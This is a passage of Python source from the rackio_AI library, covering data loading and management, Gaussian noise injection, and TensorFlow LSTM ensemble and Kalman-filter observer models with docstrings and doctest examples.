>>> df = RackioAI.load(directory, ext=".csv", _format="hysys")
>>> print(df.head())
(Time, [seconds]) (PIC-118 - PV, [kPa]) (PIC-118 - OP, [%]) (SPRDSHT-1 - Cell Matrix (G-16), []) (UIC-101 - OP, [%])
1 0 294.769 42 37.6105 10
2 0.3 294.769 42 37.6105 10
3 0.6 294.769 42 37.6105 10
4 0.9 294.769 42 37.6105 10
5 1.1 294.769 42 37.6105 10
>>> directory = os.path.join(get_directory('csv'), "VMGSim")
>>> df = RackioAI.load(directory, ext=".csv", _format="vmgsim")
>>> print(df.head())
(time, s) (/Bed-1.In.MoleFlow, kmol/h) (/Bed-1.In.P, kPa) ... (/Sep2.In.P, kPa) (/Sep3.In.P, kPa) (/Tail_Gas.In.T, C)
1 1 2072.582713 285.9299038 ... 315.8859771 291.4325134 159
2 2 2081.622826 286.9027793 ... 315.8953772 292.3627861 159
3 3 2085.98973 287.5966429 ... 316.0995398 293.0376745 159
4 4 2089.323383 288.1380485 ... 316.3974799 293.5708836 159
5 5 2092.214077 288.591646 ... 316.7350299 294.0200778 159
<BLANKLINE>
[5 rows x 16 columns]
**Example loading a .pkl with pandas.dataFrame**
>>> filename = os.path.join(get_directory('pkl_files'), 'test_data.pkl')
>>> df = RackioAI.load(filename)
>>> print(df.head())
Pipe-60 Totalmassflow_(KG/S) Pipe-151 Totalmassflow_(KG/S) Pipe-60 Pressure_(PA) Pipe-151 Pressure_(PA)
0 37.83052 37.83052 568097.3 352683.3
1 37.83918 37.70243 568098.2 353449.8
2 37.83237 37.67011 568783.2 353587.3
3 37.80707 37.67344 569367.3 353654.8
4 37.76957 37.69019 569933.5 353706.8
```
"""
filename, ext = Utils.check_path(pathname, ext=ext)
data = self.reader.read(filename, ext=ext, **kwargs)
self.columns_name = Utils.get_column_names(data)
if data.index.has_duplicates:
data = data.reset_index(drop=True)
if reset_index:
data = data.reset_index(drop=True)
self.columns_name = Utils.get_column_names(data)
self._data = data
return data
@property
def data(self):
"""
Variable where is storaged the loaded data.
**Parameters**
None
**:return:**
* **data:** (pandas.DataFrame)
"""
self.columns_name = Utils.get_column_names(self._data)
return self._data
@data.setter
def data(self, value):
"""
**Parameters**
* **:param value:** (pd.DataFrame or np.ndarray)
**:return:**
None
"""
if isinstance(value, pd.DataFrame) or isinstance(value, np.ndarray):
if hasattr(self, '_data'):
if isinstance(value, np.ndarray):
self._data = pd.DataFrame(value, columns=self.columns_name)
else:
if isinstance(self._data.columns, pd.MultiIndex):
self.columns_name = pd.MultiIndex.from_tuples(self.columns_name, names=['tag', 'variable', 'unit'])
self._data = value
else:
self.columns_name = Utils.get_column_names(value)
self._data = value
else:
raise TypeError('value must be a pd.DataFrame or np.ndarray')
def append(self, obj):
"""
Append a RackioEDA, Preprocessing or RackioDNN objects to managers.
___
**Parameters**
* **:param obj:** (RackioEDA, Preprocessing, RackioDNN) objects.
**:return:**
None
___
## Snippet code
```python
>>> from rackio_AI import RackioEDA, Preprocessing
>>> EDA = RackioEDA(name='EDA', description='Object Exploratory Data Analysis')
>>> Preprocess = Preprocessing(name="Preprocessing", description="Preprocesing object")
```
"""
if "RackioEDA" in str(type(obj)):
self._data_analysis_manager.append(obj)
elif "Preprocessing" in str(type(obj)):
self._preprocessing_manager.append(obj)
elif "RackioDNN" in str(type(obj)):
pass
def get(self, name, _type='EDA', serialize=False):
"""
Get any coupled object as RackioAI attribute like *RackioEDA*, *Preprocessing* or *RackioDNN* object
by its name
___
**Parameters**
* **:param name:** (str) Object name
* **:param _type:** (str) Object type
* **'EDA':** refers to a *DataAnalysis* or *RackioEDA* object
* **'Preprocessing':** refers to a *Preprocessing* object
* **'Model':** refers to a **Model** machine learning or deep learning object
* **:param serialize:** (bool) default=False, if is True, you get a serialized object, otherwise you get the object
**:return:**
* **object:** (object, serialized dict)
___
## Snippet code
```python
>>> from rackio_AI import RackioAI
>>> EDA = RackioAI.get("EDA", _type="EDA")
>>> Preprocess = RackioAI.get("Preprocess", _type="Preprocessing")
```
"""
if _type.lower() == 'eda':
data = self._data_analysis_manager.get(name)
if serialize:
return data.serialize()
return data
elif _type.lower() == 'preprocessing':
preprocess = self._preprocessing_manager.get(name)
if serialize:
return preprocess.serialize()
return preprocess
else:
raise TypeError('Is not possible get {} object from RackioAI'.format(_type))
return
def get_manager(self, _type):
"""
Get a manager by its type.
___
**Parameters**
* **:param _type:** (str): Manager object type.
* *'EDA'*
* *'Preprocessing'*
* *'Models'*
**:return:**
* **result:** (obj) manager object
___
## Snippet code
```python
>>> from rackio_AI import RackioAI
>>> eda_manager = RackioAI.get_manager("EDA")
>>> preprocessing_manager = RackioAI.get_manager("Preprocessing")
```
"""
if _type.lower() == 'eda':
result = self._data_analysis_manager
elif _type.lower() == 'preprocessing':
result = self._preprocessing_manager
elif _type.lower() == 'models':
result = self._models_manager
if result:
return result
return
def summary(self):
"""
Get RackioAI summary.
___
**Parameters**
None
**:returns:**
* **result:** (dict) All defined Managers
___
## Snippet code
```python
>>> from rackio_AI import RackioAI
>>> RackioAI.summary()
{'preprocessing manager': {'length': 1, 'names': ['Preprocessing'], 'descriptions': ['Preprocesing object'], 'types': ['regression']}, 'data analysis manager': {'length': 1, 'names': ['EDA'], 'descriptions': ['Object Exploratory Data Analysis']}}
```
"""
result = dict()
result["preprocessing manager"] = self._preprocessing_manager.summary()
result["data analysis manager"] = self._data_analysis_manager.summary()
return result
@staticmethod
def save(obj, filename, protocol=None, format='pkl'):
"""
Method to persist any object in pickle format
___
**Parameters**
* **:param obj:** (obj) any persistable object
* **:param filename:** (str) with no extension
* **:param format:** (str) with no dot (.) at the beginning (default='pkl')
**:return:**
* obj in the path defined by *filename*
"""
with open('{}.{}'.format(filename, format), 'wb') as file:
if protocol:
pickle.dump(obj, file, protocol=protocol)
else:
pickle.dump(obj, file, protocol=HIGHEST_PROTOCOL)
return obj
```
#### File: rackio_AI/data_analysis/noise.py
```python
import numpy as np
import pandas as pd
from easy_deco.progress_bar import ProgressBar
from rackio_AI.utils.utils_core import Utils
from easy_deco.del_temp_attr import set_to_methods, del_temp_attr
class Noise:
"""
Encapsulates method to work with noise
"""
_instances = list()
def __init__(self):
Noise._instances.append(self)
def add(
self,
df: pd.DataFrame,
win_size: int=30,
method: str="rhinehardt",
cols: list=None,
std_factor: float=0.001
)-> pd.DataFrame:
"""
Add gaussian noise over subsequence windows based on some method
**Parameters**
* **:param df:** (pandas.DataFrame)
* **:param win_size:** (int) window size to apply gaussian noise
* **:param method:** (str) method to base gaussian noise
* *rhinehardt* or *rh*
* **:param cols:** (list) column names to add gaussian noise.
**returns**
* **df** (pandas.DataFrame) noise added
______
### **Snippet code
```python
>>> import matplotlib.pyplot as plt
>>> from rackio_AI import Noise
>>> df = pd.DataFrame(np.random.randn(100,2), columns=["a", "b"])
>>> noise = Noise()
>>> df_noisy = noise.add(df, win_size=10)
>>> ax = plt.plot(df.index, df["a"], '-r', df.index, df["b"], '-b', df_noisy.index, df_noisy["a"], '--r', df_noisy.index, df_noisy["b"], '--b')
>>> ax = plt.legend(["a", "b", "noisy a", "noisy b"])
>>> plt.show()
```

"""
options = {
'win_size': win_size,
'method': method,
'std_factor': std_factor
}
self._df_ = df.copy()
if not cols:
cols = Utils.get_column_names(self._df_)
self.__first_step_add(cols, **options)
df = self._df_
return df
@ProgressBar(desc="Adding gaussian noise...", unit="columns")
def __first_step_add(self, col, **kwargs):
"""
Decorated function to visualize the progress bar during the execution of *add noise* method
**Parameters**
* **:param column_name:** (list)
**returns**
None
"""
win_size = kwargs['win_size']
windows_number = self._df_.shape[0] // win_size + 1
windows = np.array_split(self._df_.loc[:, col], windows_number, axis=0)
self._noise_ = list()
self.__last_step_add(windows, **kwargs)
self._df_.loc[:, col] = self._noise_
return
@ProgressBar(desc="Adding gaussian noise...", unit="windows")
def __last_step_add(self, window, **kwargs):
"""
Decorated function to visualize the progress bar during the execution of *add noise* method
**Parameters**
* **:param column_name:** (list)
**returns**
None
"""
method = kwargs['method']
if method.lower() in ["rhinehardt", "rh"]:
std_factor = kwargs['std_factor']
self._noise_.extend(self.rhinehardt(window, std_factor=std_factor))
return
def rhinehardt(self, x: pd.DataFrame, std_factor: float=1)->np.ndarray:
"""
Add noise to variable x based on Box-Muller transform
**Parameters**
* **:param x:** (pandas.DataFrame)
"""
x = x.values
x = x.flatten()
rng = np.random.RandomState(seed=42)
r1, r2 = rng.uniform(size=len(x)), rng.uniform(size=len(x))
xmean = np.mean(x)
s = np.sqrt(np.sum((xmean - x)**2) / (len(x) - 1))
if s <= 1:
s = std_factor * xmean
d = s * np.sqrt(-2 * np.log(r1)) * np.sin(2 * np.pi * r2)
return x + d
if __name__ == "__main__":
import doctest
doctest.testmod()
```
#### File: rackio_AI/models/ensemble.py
```python
import tensorflow as tf
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
class RackioEnsembleLSTMCell(tf.keras.layers.Layer):
r"""
Documentation here
"""
def __init__(self, units, activation='tanh', return_sequences=False, **kwargs):
r"""
Documentation here
"""
super(RackioEnsembleLSTMCell, self).__init__(**kwargs)
self.units = units
self.rackio_ensemble_lstm_cell = tf.keras.layers.LSTM(units, activation=None, return_sequences=return_sequences, **kwargs)
self.activation = tf.keras.activations.get(activation)
def call(self, inputs):
r"""
Documentation here
"""
outputs = self.rackio_ensemble_lstm_cell(inputs)
norm_outputs = self.activation(outputs)
return norm_outputs
class EnsembleScaler:
r"""
Documentation here
"""
def __init__(self, scaler):
r"""
Documentation here
"""
self.input_scaler = scaler['inputs']
self.output_scaler = scaler['outputs']
def apply(self, inputs, **kwargs):
r"""
Documentation here
"""
# INPUT SCALING
samples, timesteps, features = inputs.shape
scaled_inputs = np.concatenate([
self.input_scaler[feature](inputs[:, :, feature].reshape(-1, 1)).reshape((samples, timesteps, 1)) for feature in range(features)
], axis=2)
# OUTPUT SCALING
if 'outputs' in kwargs:
outputs = kwargs['outputs']
samples, timesteps, features = outputs.shape
scaled_outputs = np.concatenate([
self.output_scaler[feature](outputs[:, :, feature].reshape(-1, 1)).reshape((samples, timesteps, 1)) for feature in range(features)
], axis=2)
return scaled_inputs, scaled_outputs
return scaled_inputs
def inverse(self, *outputs):
r"""
Documentation here
"""
result = list()
for output in outputs:
features = output.shape[-1]
samples = output.shape[0]
# INVERSE APPLY
scaled_output = np.concatenate([
self.output_scaler[feature].inverse(output[:, feature].reshape(-1, 1)).reshape((samples, features, 1)) for feature in range(features)
], axis=2)
result.append(scaled_output)
return tuple(result)
class RackioEnsemble(tf.keras.Model):
r"""
Documentation here
"""
def __init__(
self,
units,
activations,
scaler=None,
**kwargs
):
super(RackioEnsemble, self).__init__(**kwargs)
self.units = units
# INITIALIZATION
self.scaler = EnsembleScaler(scaler)
layers_names = self.__create_layer_names(**kwargs)
if not self.__check_arg_length(units, activations, layers_names):
raise ValueError('units, activations and layer_names must be of the same length')
self.activations = activations
self.layers_names = layers_names
# HIDDEN/OUTPUT STRUCTURE DEFINITION
self.__hidden_output_structure_definition()
# LAYERS DEFINITION
self.__hidden_layers_definition()
self.__output_layer_definition()
def call(self, inputs):
r"""
Documentation here
"""
x = inputs
# HIDDEN LAYER CALL
for layer_num, units in enumerate(self.hidden_layers_units):
acunet_layer = getattr(self, self.hidden_layers_names[layer_num])
x = acunet_layer(x)
# OUTPUT LAYER CALL
acunet_output_layer = getattr(self, self.output_layer_name)
return acunet_output_layer(x)
def compile(
self,
optimizer=tf.keras.optimizers.Adam(
learning_rate=0.1,
amsgrad=True
),
loss='mse',
metrics=tf.keras.metrics.MeanAbsoluteError(),
loss_weights=None,
weighted_metrics=None,
run_eagerly=None,
steps_per_execution=None,
**kwargs
):
r"""
Documentation here
"""
super(RackioEnsemble, self).compile(
optimizer=optimizer,
loss=loss,
metrics=metrics,
loss_weights=loss_weights,
weighted_metrics=weighted_metrics,
run_eagerly=run_eagerly,
steps_per_execution=steps_per_execution,
**kwargs
)
def fit(
self,
x=None,
y=None,
validation_data=None,
epochs=3,
callbacks=[
tf.keras.callbacks.EarlyStopping(
monitor='val_loss',
patience=3,
min_delta=1e-6,
mode='min')
],
plot=False,
data_section='validation',
**kwargs
):
r"""
Documentation here
"""
self._train_data = (x, y)
self._validation_data = validation_data
if self.scaler:
x_test, y_test = validation_data
x, y = self.scaler.apply(x, outputs=y)
validation_data = self.scaler.apply(x_test, outputs=y_test)
history = super(RackioEnsemble, self).fit(
x=x,
y=y,
validation_data=validation_data,
epochs=epochs,
callbacks=callbacks,
**kwargs
)
if plot:
if data_section.lower()=='validation':
x, y = validation_data
self.evaluate(x, y, plot_prediction=True)
return history
def predict(
self,
x,
**kwargs
):
r"""
Documentation here
"""
if self.scaler:
x = self.scaler.apply(x)
y = super(RackioEnsemble, self).predict(x, **kwargs)
if self.scaler:
y = self.scaler.inverse(y)[0]
return y
def evaluate(
self,
x=None,
y=None,
plot_prediction=False,
**kwargs
):
r"""
Documentation here
"""
evaluation = super(RackioEnsemble, self).evaluate(x, y, **kwargs)
if plot_prediction:
y_predict = super(RackioEnsemble, self).predict(x, **kwargs)
if self.scaler:
y_predict = self.scaler.inverse(y_predict)[0]
y = self.scaler.inverse(y)[0]
# PLOT RESULT
y = y.reshape(y.shape[0], y.shape[-1])
y_predict = y_predict.reshape(y_predict.shape[0], y_predict.shape[-1])
_result = np.concatenate((y_predict, y), axis=1)
result = pd.DataFrame(_result, columns=['Prediction', 'Original'])
result.plot(kind='line')
plt.show()
return evaluation
```
#### File: rackio_AI/models/lstm_layer.py
```python
import tensorflow as tf
class RackioLSTMCell(tf.keras.layers.Layer):
r"""
Documentation here
"""
def __init__(self, units, activation='tanh', return_sequences=False, **kwargs):
r"""
Documentation here
"""
super(RackioLSTMCell, self).__init__(**kwargs)
self.units = units
self.rackio_lstm_cell = tf.keras.layers.LSTM(units, activation=None, return_sequences=return_sequences, **kwargs)
self.activation = tf.keras.activations.get(activation)
def build(self, input_shape):
r"""
Documentation here
"""
self._input_shape = input_shape
return super().build(input_shape)
def call(self, inputs):
r"""
Documentation here
"""
outputs = self.rackio_lstm_cell(inputs)
norm_outputs = self.activation(outputs)
return norm_outputs
def compute_output_shape(self, input_shape):
return super().compute_output_shape(input_shape)
def get_config(self):
r"""
Documentation here
"""
base_config = super().get_config()
return {
**base_config,
"units": self.units,
"input_shape": self._input_shape,
"activation": self.activation
}
```
#### File: rackio_AI/models/observer.py
```python
import tensorflow as tf
import tensorflow_probability as tfp
import numpy as np
from rackio_AI.models.scaler import RackioDNNLayerScaler, RackioDNNLayerInverseScaler
from rackio_AI.models.gaussian_noise import RackioGaussianNoise
class RackioObserverDense(tf.keras.layers.Layer):
r"""
Documentation here
"""
def __init__(self, units, activation=None, **kwargs):
super().__init__(**kwargs)
self.units = units
self.activation = tf.keras.activations.get(activation)
def build(self, batch_input_shape):
r"""
Documentation here
"""
self.kernel = self.add_weight(
name="kernel",
shape=[batch_input_shape[-1], self.units],
initializer=tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05, seed=None),
trainable=True
)
self.bias = self.add_weight(
name="bias",
shape=[self.units],
initializer=tf.keras.initializers.RandomUniform(minval=-0.05, maxval=0.05, seed=None),
trainable=True
)
super().build(batch_input_shape)
def call(self, X):
r"""
Documentation here
"""
return self.activation(X @ self.kernel + self.bias)
# def compute_output_shape(self, batch_input_shape):
# r"""
# Documentation here
# """
# return tf.TensorShape(batch_input_shape.as_list()[:-1] + [self.units])
def get_config(self):
r"""
Documentation here
"""
base_config = super().get_config()
return {
**base_config,
"units": self.units,
"activation": tf.keras.activations.serialize(self.activation)
}
class RackioObserverLSTM_f(tf.keras.layers.Layer):
r"""
Documentation here
"""
def __init__(self, units, activation='tanh', return_sequences=False, **kwargs):
r"""
Documentation here
"""
super(RackioObserverLSTM_f, self).__init__(**kwargs)
self.units = units
self.rackio_observer_lstm_cell = tf.keras.layers.LSTM(units, activation=None, return_sequences=return_sequences, **kwargs)
self.F = tf.Variable(np.zeros((1, 1)), dtype=tf.dtypes.float32)
self.rackio_dense_layer = RackioObserverDense(1, activation="tanh")
self.activation = tf.keras.activations.get(activation)
def build(self, input_shape):
r"""
Documentation here
"""
self.batch_size = 32
if input_shape[0]:
self.batch_size = input_shape[0]
super(RackioObserverLSTM_f, self).build(input_shape)
def call(self, inputs):
r"""
Documentation here
"""
# Firt LSTM_f layer
outputs = self.rackio_observer_lstm_cell(inputs)
norm_outputs = self.activation(outputs)
# Dense layer
f_t = self.rackio_dense_layer(norm_outputs)
f = tf.reshape(f_t, (f_t.shape[1], f_t.shape[2]))
# f Jacobian
rows_f, cols_f = f.shape
# Si la salida de la LSTM_f es una sola variable se calcula gradiente y no el jacobiano
for i in range(cols_f):
for j in range(cols_f):
y_t = f[0, i]
y_t_1 = f[1, i]
x_k_1 = f[1, j]
x_k_2 = f[2, j]
self.F[i, j].assign((y_t - y_t_1) / (x_k_1 - x_k_2))
return f_t, f, self.F
class RackioObserverLSTM_Q(tf.keras.layers.Layer):
r"""
Documentation here
"""
def __init__(self, units, activation='tanh', return_sequences=False, **kwargs):
r"""
Documentation here
"""
super(RackioObserverLSTM_Q, self).__init__(**kwargs)
self.units = units
self.rackio_observer_lstm_cell = tf.keras.layers.LSTM(units, activation=None, return_sequences=return_sequences, **kwargs)
self.rackio_dense_layer = RackioObserverDense(1, activation="tanh")
self.activation = tf.keras.activations.get(activation)
def build(self, input_shape):
r"""
Documentation here
"""
self.batch_size = 32
if input_shape[0]:
self.batch_size = input_shape[0]
super(RackioObserverLSTM_Q, self).build(input_shape)
def call(self, inputs):
r"""
Documentation here
"""
# Firt LSTM_f layer
outputs = self.rackio_observer_lstm_cell(inputs)
norm_outputs = self.activation(outputs)
# Dense layer
q_t = self.rackio_dense_layer(norm_outputs)
q = tf.reshape(q_t, (q_t.shape[1], q_t.shape[2]))
Q = tfp.stats.covariance(q, event_axis=1)
return Q
class RackioObserverLSTM_R(tf.keras.layers.Layer):
r"""
Documentation here
"""
def __init__(self, units, activation='tanh', return_sequences=False, **kwargs):
r"""
Documentation here
"""
super(RackioObserverLSTM_R, self).__init__(**kwargs)
self.units = units
self.rackio_observer_lstm_cell = tf.keras.layers.LSTM(units, activation=None, return_sequences=return_sequences, **kwargs)
self.rackio_dense_layer = RackioObserverDense(2, activation="tanh")
self.activation = tf.keras.activations.get(activation)
def build(self, input_shape):
r"""
Documentation here
"""
self.batch_size = 32
if input_shape[0]:
self.batch_size = input_shape[0]
super(RackioObserverLSTM_R, self).build(input_shape)
def call(self, inputs):
r"""
Documentation here
"""
# Firt LSTM_f layer
outputs = self.rackio_observer_lstm_cell(inputs)
norm_outputs = self.activation(outputs)
# Dense layer
r_t = self.rackio_dense_layer(norm_outputs)
r = tf.reshape(r_t, (r_t.shape[1], r_t.shape[2]))
R = tfp.stats.covariance(r, event_axis=1)
return R
class RackioObserverLSTM_H(tf.keras.layers.Layer):
r"""
Documentation here
"""
def __init__(self, units, activation='tanh', return_sequences=False, **kwargs):
r"""
Documentation here
"""
super(RackioObserverLSTM_H, self).__init__(**kwargs)
self.units = units
self.rackio_observer_lstm_cell = tf.keras.layers.LSTM(units, activation=None, return_sequences=return_sequences, **kwargs)
self.rackio_dense_layer = RackioObserverDense(2, activation="tanh")
self.H = tf.Variable(np.zeros((2, 1)), dtype=tf.dtypes.float32)
self.activation = tf.keras.activations.get(activation)
def build(self, input_shape):
r"""
Documentation here
"""
self.batch_size = 32
if input_shape[0]:
self.batch_size = input_shape[0]
super(RackioObserverLSTM_H, self).build(input_shape)
def call(self, inputs, f):
r"""
Documentation here
"""
# Firt LSTM_f layer
outputs = self.rackio_observer_lstm_cell(inputs)
norm_outputs = self.activation(outputs)
# Dense layer
h = self.rackio_dense_layer(norm_outputs)
# LSTM_H computation
rows_f, cols_f = f.shape
h_c = tf.reshape(h, (h.shape[1], h.shape[2]))
x = f
rows_h, cols_h = h_c.shape
for i in range(cols_h):
for j in range(cols_f):
h_t = h_c[0, i]
h_t_1 = h_c[1, i]
x_k_1 = x[1, j]
x_k_2 = x[2, j]
self.H[i, j].assign((h_t - h_t_1) / (x_k_1 - x_k_2))
h = h_c[0, :]
h = tf.reshape(h, (h.shape[0], 1))
return h, self.H
class RackioKF(tf.keras.layers.Layer):
r"""
Documentation here
"""
def __init__(self, **kwargs):
r"""
Documentation here
"""
super(RackioKF, self).__init__(**kwargs)
# y_t_corregido initialization
y_t_corregido = np.zeros((1, 1))
self.y_t_corregido = tf.Variable(y_t_corregido, dtype=tf.dtypes.float32)
# P_t initialization
p = np.zeros((1, 1))
self.P_t = tf.Variable(p, dtype=tf.dtypes.float32)
self.I = tf.eye(1, 1)
def build(self, input_shape):
r"""
Documentation here
"""
self.batch_size = 32
if input_shape[0]:
self.batch_size = input_shape[0]
super(RackioKF, self).build(input_shape)
def call(self, z, f, F, h, H, Q, R):
r"""
Documentation here
"""
F_t = tf.transpose(F)
H_t = tf.transpose(H)
# Prediction Step (Kalman Intro / Coskun)
P_t = tf.add( tf.matmul( tf.matmul(F, self.P_t), F_t), Q)
# Correction Step
K_t = tf.matmul( tf.matmul(P_t, H_t), tf.linalg.inv( tf.add( tf.matmul( tf.matmul(H, P_t), H_t), R)))
self.y_t_corregido.assign(tf.add( f[0, :], tf.matmul( K_t, tf.subtract(z, h))))
self.P_t.assign(tf.matmul(tf.subtract(self.I, tf.matmul(K_t, H)), P_t))
return self.y_t_corregido
class RackioObserver(tf.keras.Model):
r"""
Documentation here
"""
def __init__(
self,
units,
activations,
min_max_values=None,
add_gn: bool=True,
**kwargs
):
# INITIALIZATION
super(RackioObserver, self).__init__(**kwargs)
self.lstm_f = RackioObserverLSTM_f(units[0], activation=activations[0], return_sequences=True)
self.lstm_H = RackioObserverLSTM_H(units[3], activation=activations[3], return_sequences=True)
self.lstm_Q = RackioObserverLSTM_Q(units[1], activation=activations[1], return_sequences=True)
self.lstm_R = RackioObserverLSTM_R(units[2], activation=activations[2], return_sequences=True)
self.KF = RackioKF(**kwargs)
self.scaler = None
self.add_gn = add_gn
if self.add_gn:
self.gaussian_noise = RackioGaussianNoise()
if min_max_values:
self.X_min, self.y_min, self.X_max, self.y_max = min_max_values
self.scaler = RackioDNNLayerScaler(self.X_min, self.X_max)
self.inverse_scaler = RackioDNNLayerInverseScaler(self.y_min, self.y_max)
def call(self, inputs):
r"""
**Parameters**
* *:param u:* (Input tensor) Inlet / Outlet Pressure
* *:param z:* (Input tensor) Inlet / Outlet Flow
"""
if self.add_gn:
inputs = self.gaussian_noise(inputs)
if self.scaler:
inputs = self.scaler(inputs)
u = inputs[:, :, 0:2]
z = inputs[:, :, 2:]
f_t, f, F = self.lstm_f(u)
h, H = self.lstm_H(f_t, f)
Q = self.lstm_Q(f_t)
R = self.lstm_R(z)
z = tf.reshape(z, (z.shape[1], z.shape[2]))[0, :]
z = tf.reshape(z, (z.shape[0], 1))
# Observer layer based on Kalman Filter
y = self.KF(z, f, F, h, H, Q, R)
if self.inverse_scaler:
y = self.inverse_scaler(y)
return y
def compile(
self,
optimizer=tf.keras.optimizers.Adam(
learning_rate=0.01,
amsgrad=True
),
loss='mse',
metrics=tf.keras.metrics.MeanAbsoluteError(),
loss_weights=None,
weighted_metrics=None,
run_eagerly=None,
steps_per_execution=None,
**kwargs
):
r"""
Configures the model for training.
**Parameters**
* **:param optimizer:** String (name of optimizer) or optimizer instance.
* **[tf.keras.optimizers.Adam](https://www.tensorflow.org/api_docs/python/tf/keras/optimizers/Adam)**:
Optimizer that implements the Adam algorithm.
* **[tf.keras.optimizers.Adadelta](https://www.tensorflow.org/api_docs/python/tf/keras/optimizers/Adadelta)**:
Optimizer that implements the Adadelta algorithm.
* **[tf.keras.optimizers.Adagrad](https://www.tensorflow.org/api_docs/python/tf/keras/optimizers/Adagrad)**:
Optimizer that implements the Adagrad algorithm.
* **[tf.keras.optimizers.Adamax](https://www.tensorflow.org/api_docs/python/tf/keras/optimizers/Adamax)**:
Optimizer that implements the Adamax algorithm.
* **[tf.keras.optimizers.Ftrl](https://www.tensorflow.org/api_docs/python/tf/keras/optimizers/Ftrl)**:
Optimizer that implements the FTRL algorithm.
* **[tf.keras.optimizers.Nadam](https://www.tensorflow.org/api_docs/python/tf/keras/optimizers/Nadam)**:
Optimizer that implements the Nadam algorithm.
* **[tf.keras.optimizers.RMSprop](https://www.tensorflow.org/api_docs/python/tf/keras/optimizers/RMSprop)**:
Optimizer that implements the RMSprop algorithm.
* **[tf.keras.optimizers.SGD](https://www.tensorflow.org/api_docs/python/tf/keras/optimizers/SGD)**:
Optimizer that implements the SGD algorithm.
* **:param loss:** String (name of objective function), objective function or tf.keras.losses.Loss
instance. See [tf.keras.losses](https://www.tensorflow.org/api_docs/python/tf/keras/losses).
An objective function is any callable with the signature loss = fn(y_true, y_pred),
where y_true = ground truth values with shape = [batch_size, d0, .. dN], except sparse loss
functions such as sparse categorical crossentropy where shape = [batch_size, d0, .. dN-1].
y_pred = predicted values with shape = [batch_size, d0, .. dN]. It returns a weighted loss float tensor.
If a custom Loss instance is used and reduction is set to NONE, return value has the shape [batch_size, d0, .. dN-1]
ie. per-sample or per-timestep loss values; otherwise, it is a scalar. If the model has multiple outputs,
you can use a different loss on each output by passing a dictionary or a list of losses. The loss value that
will be minimized by the model will then be the sum of all individual losses.
## Classes
* **[tf.keras.losses.BinaryCrossentropy](https://www.tensorflow.org/api_docs/python/tf/keras/losses/BinaryCrossentropy)**
Computes the cross-entropy loss between true labels and predicted labels.
* **[tf.keras.losses.CategoricalCrossentropy](https://www.tensorflow.org/api_docs/python/tf/keras/losses/CategoricalCrossentropy)**
Computes the crossentropy loss between the labels and predictions.
* **[tf.keras.losses.CategoricalHinge](https://www.tensorflow.org/api_docs/python/tf/keras/losses/CategoricalHinge)**
Computes the categorical hinge loss between y_true and y_pred.
* **[tf.keras.losses.CosineSimilarity](https://www.tensorflow.org/api_docs/python/tf/keras/losses/CosineSimilarity)**
Computes the cosine similarity between labels and predictions.
* **[tf.keras.losses.Hinge](https://www.tensorflow.org/api_docs/python/tf/keras/losses/Hinge)**
Computes the hinge loss between y_true and y_pred.
* **[tf.keras.losses.Huber](https://www.tensorflow.org/api_docs/python/tf/keras/losses/Huber)**
Computes the Huber loss between y_true and y_pred.
* **[tf.keras.losses.KLDivergence](https://www.tensorflow.org/api_docs/python/tf/keras/losses/KLDivergence)**
Computes Kullback-Leibler divergence loss between y_true and y_pred.
* **[tf.keras.losses.LogCosh](https://www.tensorflow.org/api_docs/python/tf/keras/losses/LogCosh)**
Computes the logarithm of the hyperbolic cosine of the prediction error.
* **[tf.keras.losses.MeanAbsoluteError](https://www.tensorflow.org/api_docs/python/tf/keras/losses/MeanAbsoluteError)**
Computes the mean of absolute difference between labels and predictions.
* **[tf.keras.losses.MeanAbsolutePercentageError](https://www.tensorflow.org/api_docs/python/tf/keras/losses/MeanAbsolutePercentageError)**
Computes the mean absolute percentage error between y_true and y_pred.
* **[tf.keras.losses.MeanSquaredError](https://www.tensorflow.org/api_docs/python/tf/keras/losses/MeanSquaredError)**
Computes the mean of squares of errors between labels and predictions.
* **[tf.keras.losses.MeanSquaredLogarithmicError](https://www.tensorflow.org/api_docs/python/tf/keras/losses/MeanSquaredLogarithmicError)**
Computes the mean squared logarithmic error between y_true and y_pred.
* **[tf.keras.losses.Poisson](https://www.tensorflow.org/api_docs/python/tf/keras/losses/Poisson)**
Computes the Poisson loss between y_true and y_pred.
* **[tf.keras.losses.Reduction](https://www.tensorflow.org/api_docs/python/tf/keras/losses/Reduction)**
Types of loss reduction.
* **[tf.keras.losses.SparseCategoricalCrossentropy](https://www.tensorflow.org/api_docs/python/tf/keras/losses/SparseCategoricalCrossentropy)**
Computes the crossentropy loss between the labels and predictions.
* **[tf.keras.losses.SquaredHinge](https://www.tensorflow.org/api_docs/python/tf/keras/losses/SquaredHinge)**
Computes the squared hinge loss between y_true and y_pred.
## Functions
* **[KLD(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/KLD):**
Computes Kullback-Leibler divergence loss between y_true and y_pred.
* **[MAE(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/MAE):**
Computes the mean absolute error between labels and predictions.
* **[MAPE(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/MAPE):**
Computes the mean absolute percentage error between y_true and y_pred.
* **[MSE(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/MSE):**
Computes the mean squared error between labels and predictions.
* **[MSLE(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/MSLE):**
Computes the mean squared logarithmic error between y_true and y_pred.
* **[binary_crossentropy(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/binary_crossentropy):**
Computes the binary crossentropy loss.
* **[categorical_crossentropy(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/categorical_crossentropy):**
Computes the categorical crossentropy loss.
* **[categorical_hinge(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/categorical_hinge):**
Computes the categorical hinge loss between y_true and y_pred.
* **[cosine_similarity(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/cosine_similarity):**
Computes the cosine similarity between labels and predictions.
* **[deserialize(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/deserialize):**
Deserializes a serialized loss class/function instance.
* **[get(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/get):**
Retrieves a Keras loss as a function/Loss class instance.
* **[hinge(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/hinge):**
Computes the hinge loss between y_true and y_pred.
* **[huber(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/huber):**
Computes Huber loss value.
* **[kl_divergence(...)](https://www.tensorflow.org/api_docs/python/tf/keras/losses/kl_divergence):**
